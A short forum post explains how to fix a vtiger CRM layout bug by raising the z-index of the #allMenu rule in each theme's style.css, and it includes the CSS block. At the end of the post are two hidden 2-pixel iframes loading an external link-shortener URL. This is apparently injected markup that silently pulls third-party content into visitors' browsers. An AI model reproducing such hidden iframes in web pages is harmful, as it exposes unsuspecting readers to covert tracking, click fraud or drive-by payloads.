AllMenu not on Top

If you are viewing a page that has not records, vtiger now displays a nice message indicating there are no records. Problem is the zindex for this message is higher than the one for the AllMenu. When you click the AllMenu (this is the menu which lists every module in vtiger in one place), it appears beneath this display message. By increasing the zindex on the AllMenu, the problem is resolved. This is stored around line #2128 in the style.css file for each of the themes. Search for the #allMenu text to find it more quickly.
#allMenu{
    width:500px;
    border:4px solid #c5bfb3;
    left:300px;
    top:100px;
    position:absolute;
    z-index:10000001;
    display:none;
    padding:10px;
    background:#ffffff url(images/layerPopUpBg.gif);
}

I merely added an extra zero in the middle of the z-index, and this resolved the issue. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

This discussion has been closed.